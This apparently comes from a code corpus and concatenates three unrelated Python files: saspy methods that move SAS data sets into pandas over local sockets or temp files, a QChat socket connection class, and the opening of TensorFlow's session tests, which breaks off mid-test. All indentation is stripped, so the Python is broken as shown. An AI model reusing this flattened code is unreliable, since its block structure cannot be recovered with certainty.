code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
return None
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
rdelim = "'"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+"'x"
cdelim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x"
if self._sb.m5dsbug:
code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v termstr=LF;\n"
else:
code = "filename sock socket '"+host+":"+str(port)+"' recfm=S lrecl=4096;\n"
#code = "filename sock socket '"+host+":"+str(port)+"' lrecl=1 recfm=f encoding=binary;\n"
code += "data _null_; set "+tabname+self._sb._dsopts(dsopts)+";\n"
for i in range(nvars):
if vartype[i] == 'N':
code += "format '"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10.'
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6'
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6'
else:
code += 'best32.'
code += '; '
if i % 10 == 0:
code +='\n'
if self._sb.m5dsbug:
rsep = colsep+rowsep+'\n'
csep = colsep
code += "\nfile sock dlm="+cdelim+";\n"
for i in range(nvars):
if vartype[i] != 'N':
code += "'"+varlist[i]+"'n = translate('"
code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
'%02x%02x' % \
(ord(rowrep.encode(self.sascfg.encoding)), \
ord(colrep.encode(self.sascfg.encoding))),
'%02x%02x' % \
(ord(rowsep.encode(self.sascfg.encoding)), \
ord(colsep.encode(self.sascfg.encoding))))
if i % 10 == 0:
code +='\n'
code += "\nput "
for i in range(nvars):
code += " '"+varlist[i]+"'n "
if i % 10 == 0:
code +='\n'
code += rdelim+";\nrun;"
else:
rsep = ' '+rowsep
csep = ' '+colsep
code += "\nfile sock;\n"
for i in range(nvars):
if vartype[i] != 'N':
code += "'"+varlist[i]+"'n = translate('"
code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
'%02x%02x' % \
(ord(rowrep.encode(self.sascfg.encoding)), \
ord(colrep.encode(self.sascfg.encoding))),
'%02x%02x' % \
(ord(rowsep.encode(self.sascfg.encoding)), \
ord(colsep.encode(self.sascfg.encoding))))
if i % 10 == 0:
code +='\n'
code += "\n"
last = len(varlist)-1
for i in range(nvars):
code += "put '"+varlist[i]+"'n "
if i != last:
code += cdelim+'; '
else:
code += rdelim+'; '
if i % 10 == 0:
code +='\n'
code += "run;"
sock.listen(1)
self._asubmit(code, 'text')
r = []
df = None
datar = b''
trows = kwargs.get('trows', None)
if not trows:
trows = 100000
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
newsock = (0,0)
try:
newsock = sock.accept()
while True:
data = newsock[0].recv(4096)
if len(data):
datar += data
else:
break
data = datar.rpartition(rsep.encode())
datap = data[0]+data[1]
datar = data[2]
datap = datap.decode(self.sascfg.encoding, errors='replace')
for i in datap.split(sep=rsep):
if i != '':
r.append(tuple(i.split(sep=csep)))
if len(r) > trows:
tdf = pd.DataFrame.from_records(r, columns=varlist)
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
if tdf.dtypes[tdf.columns[i]].kind not in ('f','u','i','b','B','c','?'):
tdf[varlist[i]] = pd.to_numeric(tdf[varlist[i]], errors='coerce')
else:
if tdf.dtypes[tdf.columns[i]].kind not in ('M'):
tdf[varlist[i]] = pd.to_datetime(tdf[varlist[i]], errors='coerce')
else:
tdf[varlist[i]].replace(' ', np.NaN, True)
if df is not None:
df = df.append(tdf, ignore_index=True)
else:
df = tdf
r = []
except (KeyboardInterrupt, Exception) as e:
print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except Exception as e:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
if len(r) > 0 or df is None:
tdf = pd.DataFrame.from_records(r, columns=varlist)
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
if tdf.dtypes[tdf.columns[i]].kind not in ('f','u','i','b','B','c','?'):
tdf[varlist[i]] = pd.to_numeric(tdf[varlist[i]], errors='coerce')
else:
if tdf.dtypes[tdf.columns[i]].kind not in ('M'):
tdf[varlist[i]] = pd.to_datetime(tdf[varlist[i]], errors='coerce')
else:
tdf[varlist[i]].replace(' ', np.NaN, True)
if df is not None:
df = df.append(tdf, ignore_index=True)
else:
df = tdf
return df
def sasdata2dataframeCSV(self, table: str, libref: str ='', dsopts: dict = None, opts: dict = None,
tempfile: str=None, tempkeep: bool=False, port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
dsopts - data set options for the input SAS Data Set
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
tempfile - file to use to store CSV, else temporary file will be used.
tempkeep - if you specify your own file to use with tempfile=, this controls whether it's cleaned up after using it
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
These two options are for advanced usage. They override how saspy imports data. For more info
see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques
dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
"""
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if libref:
tabname = libref+".'"+table.strip()+"'n "
else:
tabname = "'"+table.strip()+"'n "
tmpdir = None
if tempfile is None:
tmpdir = tf.TemporaryDirectory()
tmpcsv = tmpdir.name+os.sep+"tomodsx"
else:
tmpcsv = tempfile
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
if self.sascfg.ssh:
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
return None
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v encoding='utf-8';\n"
else:
host = ''
code = "filename sock '"+tmpcsv+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v encoding='utf-8';\n"
code += "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";\nformat "
idx_col = kwargs.pop('index_col', False)
eng = kwargs.pop('engine', 'c')
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if k_dts is None and my_fmts:
print("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
my_fmts = False
if not my_fmts:
for i in range(nvars):
if vartype[i] == 'N':
code += "'"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10. '
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6 '
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6 '
else:
code += 'best32. '
code += ";\n run;\n"
ll = self.submit(code, "text")
if k_dts is None:
dts = {}
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
dts[varlist[i]] = 'float'
else:
dts[varlist[i]] = 'str'
else:
dts[varlist[i]] = 'str'
else:
dts = k_dts
code = ''
code = "proc export data=work.sasdata2dataframe outfile=sock dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
if self.sascfg.ssh:
csv = open(tmpcsv, mode='wb')
sock.listen(1)
self._asubmit(code, 'text')
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
newsock = (0,0)
try:
newsock = sock.accept()
while True:
data = newsock[0].recv(4096)
if not len(data):
break
csv.write(data)
except (KeyboardInterrupt, Exception) as e:
print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
csv.close()
df = pd.read_csv(tmpcsv, index_col=idx_col, engine=eng, dtype=dts, **kwargs)
else:
ll = self.submit(code, "text")
try:
df = pd.read_csv(tmpcsv, index_col=idx_col, engine=eng, dtype=dts, **kwargs)
except FileNotFoundError:
print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
if tmpdir:
tmpdir.cleanup()
return ll['LOG']
if tmpdir:
tmpdir.cleanup()
else:
if not tempkeep:
os.remove(tmpcsv)
if k_dts is None: # don't override these if user provided their own dtypes
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
df[varlist[i]] = pd.to_datetime(df[varlist[i]], errors='coerce')
return df
def sasdata2dataframeDISK(self, table: str, libref: str ='', dsopts: dict = None,
rowsep: str = '\x01', colsep: str = '\x02',
rowrep: str = ' ', colrep: str = ' ', tempfile: str=None,
tempkeep: bool=False, port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
dsopts - data set options for the input SAS Data Set
rowsep - the row seperator character to use; defaults to '\x01'
colsep - the column seperator character to use; defaults to '\x02'
rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
colrep - the char to convert to for any embedded colsep chars, defaults to ' '
tempfile - file to use to store CSV, else temporary file will be used.
tempkeep - if you specify your own file to use with tempfile=, this controls whether it's cleaned up after using it
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
These two options are for advanced usage. They override how saspy imports data. For more info
see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques
dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
"""
dsopts = dsopts if dsopts is not None else {}
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if libref:
tabname = libref+".'"+table.strip()+"'n "
else:
tabname = "'"+table.strip()+"'n "
tmpdir = None
if tempfile is None:
tmpdir = tf.TemporaryDirectory()
tmpcsv = tmpdir.name+os.sep+"tomodsx"
else:
tmpcsv = tempfile
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
if self.sascfg.ssh or self._sb.m5dsbug:
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
return None
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
enc = 'utf_8'
if self._sb.m5dsbug:
code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v termstr=LF;\n"
else:
code = "filename sock socket '"+host+":"+str(port)+"' recfm=S lrecl=4096;\n"
#code = "filename sock socket '"+host+":"+str(port)+"' lrecl=1 recfm=F encoding=binary;\n"
else:
host = ''
enc = self.sascfg.encoding
code = "filename sock '"+tmpcsv +"' lrecl=1 recfm=F encoding=binary;\n"
rdelim = "'"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+"'x"
cdelim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x"
idx_col = kwargs.pop('index_col', False)
eng = kwargs.pop('engine', 'c')
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if k_dts is None and my_fmts:
print("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
my_fmts = False
code += "data _null_; set "+tabname+self._sb._dsopts(dsopts)+";\n"
if not my_fmts:
for i in range(nvars):
if vartype[i] == 'N':
code += "format '"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10.'
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6'
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6'
else:
code += 'best32.'
code += '; '
if i % 10 == 0:
code +='\n'
if self._sb.m5dsbug:
rsep = colsep+rowsep+'\n'
csep = colsep
code += "\nfile sock dlm="+cdelim+";\n"
for i in range(nvars):
if vartype[i] != 'N':
code += "'"+varlist[i]+"'n = translate('"
code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
'%02x%02x' % \
(ord(rowrep.encode(self.sascfg.encoding)), \
ord(colrep.encode(self.sascfg.encoding))),
'%02x%02x' % \
(ord(rowsep.encode(self.sascfg.encoding)), \
ord(colsep.encode(self.sascfg.encoding))))
if i % 10 == 0:
code +='\n'
code += "\nput "
for i in range(nvars):
code += " '"+varlist[i]+"'n "
if i % 10 == 0:
code +='\n'
code += rdelim+";\nrun;"
else:
rsep = ' '+rowsep
csep = ' '+colsep
code += "\nfile sock;\n"
for i in range(nvars):
if vartype[i] != 'N':
code += "'"+varlist[i]+"'n = translate('"
code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
'%02x%02x' % \
(ord(rowrep.encode(self.sascfg.encoding)), \
ord(colrep.encode(self.sascfg.encoding))),
'%02x%02x' % \
(ord(rowsep.encode(self.sascfg.encoding)), \
ord(colsep.encode(self.sascfg.encoding))))
if i % 10 == 0:
code +='\n'
code += "\n"
last = len(varlist)-1
for i in range(nvars):
code += "put '"+varlist[i]+"'n "
if i != last:
code += cdelim+'; '
else:
code += rdelim+'; '
if i % 10 == 0:
code +='\n'
code += "run;"
if self.sascfg.ssh or self._sb.m5dsbug:
csv = open(tmpcsv, mode='w', encoding=enc)
sock.listen(1)
self._asubmit(code, 'text')
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
datar = b""
newsock = (0,0)
try:
newsock = sock.accept()
while True:
data = newsock[0].recv(4096)
if len(data):
datar += data
else:
break
data = datar.rpartition(rsep.encode())
datap = data[0]+data[1]
datar = data[2]
'''
if not self._sb.m5dsbug:
csv.write(datap.decode(self.sascfg.encoding, errors='replace'))
else:
csv.write(datap.decode(self.sascfg.encoding, errors='replace').replace(rsep,rowsep))
'''
csv.write(datap.decode(self.sascfg.encoding, errors='replace').replace(rsep,rowsep))
except (KeyboardInterrupt, Exception) as e:
print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
csv.close()
else:
ll = self.submit(code, "text")
if k_dts is None:
dts = {}
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
dts[varlist[i]] = 'float'
else:
dts[varlist[i]] = 'str'
else:
dts[varlist[i]] = 'str'
else:
dts = k_dts
miss = ['.', ' ', '. ']
quoting = kwargs.pop('quoting', 3)
try:
df = pd.read_csv(tmpcsv, index_col=idx_col, engine=eng, header=None, names=varlist,
sep=colsep, lineterminator=rowsep, dtype=dts, na_values=miss,
encoding=enc, quoting=quoting, **kwargs)
except FileNotFoundError:
print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
if tmpdir:
tmpdir.cleanup()
return ll['LOG']
if tmpdir:
tmpdir.cleanup()
else:
if not tempkeep:
os.remove(tmpcsv)
if k_dts is None: # don't override these if user provided their own dtypes
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
df[varlist[i]] = pd.to_datetime(df[varlist[i]], errors='coerce')
return df
|
connection.py | import socket
import threading
from QChat.log import QChatLogger
from QChat.messages import HEADER_LENGTH, PAYLOAD_SIZE, MAX_SENDER_LENGTH, MessageFactory
from SimulaQron.cqc.pythonLib.cqc import *
class ConnectionError(Exception):
pass
class DaemonThread(threading.Thread):
"""
Thread class that defaults to running the thread with a daemon so that the thread can exit
properly
"""
def __init__(self, target):
super().__init__(target=target, daemon=True)
self.start()
class QChatConnection:
def __init__(self, name, config):
"""
Initialize a connection to the CQC server and
:param name: Name of the host (Must be one available by SimulaQron CQC)
:param config: Configuration for the connection
"""
# Lock on the connection
self.lock = threading.Lock()
# Logger
self.logger = QChatLogger(__name__)
# CQC and listening socket
self.cqc = None
self.listening_socket = None
self.cqc = CQCConnection(name)
# Host name the connection belongs to
self.name = name
# Listening configuration
self.host = config['host']
self.port = config['port']
# Inbound message queue
self.message_queue = []
# Daemon threads
self.listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.classical_thread = DaemonThread(target=self.listen_for_classical)
def __del__(self):
if self.cqc:
self.cqc.close()
if self.listening_socket:
self.listening_socket.close()
def get_connection_info(self):
info = {
"connection": {
"host": self.host,
"port": self.port
}
}
return info
def listen_for_classical(self):
"""
A daemon for handling incoming connections.
:return: None
"""
self.listening_socket.bind((self.host, self.port))
while True:
self.logger.debug("Listening for incoming connection")
self.listening_socket.listen(1)
conn, addr = self.listening_socket.accept()
self.logger.debug("Got connection from {}".format(addr))
self.start_handler(conn, addr)
def start_handler(self, conn, addr):
"""
Simple connection handler that passes work to thread
:param conn: Connection information from socket
:param addr: Address information from socket
:return: None
"""
t = threading.Thread(target=self._handle_connection, args=(conn, addr))
t.start()
def _handle_connection(self, conn, addr):
"""
Receives incoming QChat Messages and verifies their structure before storing them
so that they can be retrieved.
:param conn: Connection information from sockets
:param addr: Address information from sockets
:return: None
"""
# Verify the header structure
header = conn.recv(HEADER_LENGTH)
if header not in MessageFactory().message_mapping.keys():
raise ConnectionError("Incorrect message header")
# Verify the sender structe
padded_sender = conn.recv(MAX_SENDER_LENGTH)
if len(padded_sender) != MAX_SENDER_LENGTH:
raise ConnectionError("Incorrect sender length")
# Verify the sender info
sender = str(padded_sender.replace(b'\x00', b''), 'utf-8')
if len(sender) == 0:
raise ConnectionError("Invalid sender")
# Get the message size
size = conn.recv(PAYLOAD_SIZE)
if len(size) != PAYLOAD_SIZE:
raise ConnectionError("Incorrect payload size")
# Retrieve the message data
data_length = int.from_bytes(size, 'big')
message_data = b''
while len(message_data) < data_length:
data = conn.recv(1024)
if not data:
raise ConnectionError("Message data too short")
message_data += data
# Verify the length of the sent data
if len(message_data) > data_length or conn.recv(1):
raise ConnectionError("Message data too long")
# Pass the message up
self.logger.debug("Inserting message into queue")
m = MessageFactory().create_message(header, sender, message_data)
self._append_message_to_queue(m)
conn.close()
def _append_message_to_queue(self, message):
with self.lock:
self.message_queue.append(message)
def _pop_message_from_queue(self):
with self.lock:
return self.message_queue.pop(0)
def recv_message(self):
"""
Method that returns the oldest message in the queue
:return: None
"""
return self._pop_message_from_queue() if self.message_queue else None
def send_message(self, host, port, message):
"""
Connects and sends a message to the specified host:port
:param host: Hostname to send to
:param port: Port to send to
:param message: Bytes object message
:return: None
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(message)
s.close()
self.logger.debug("Sent message to {}:{}".format(host, port))
|
session_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]],
dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
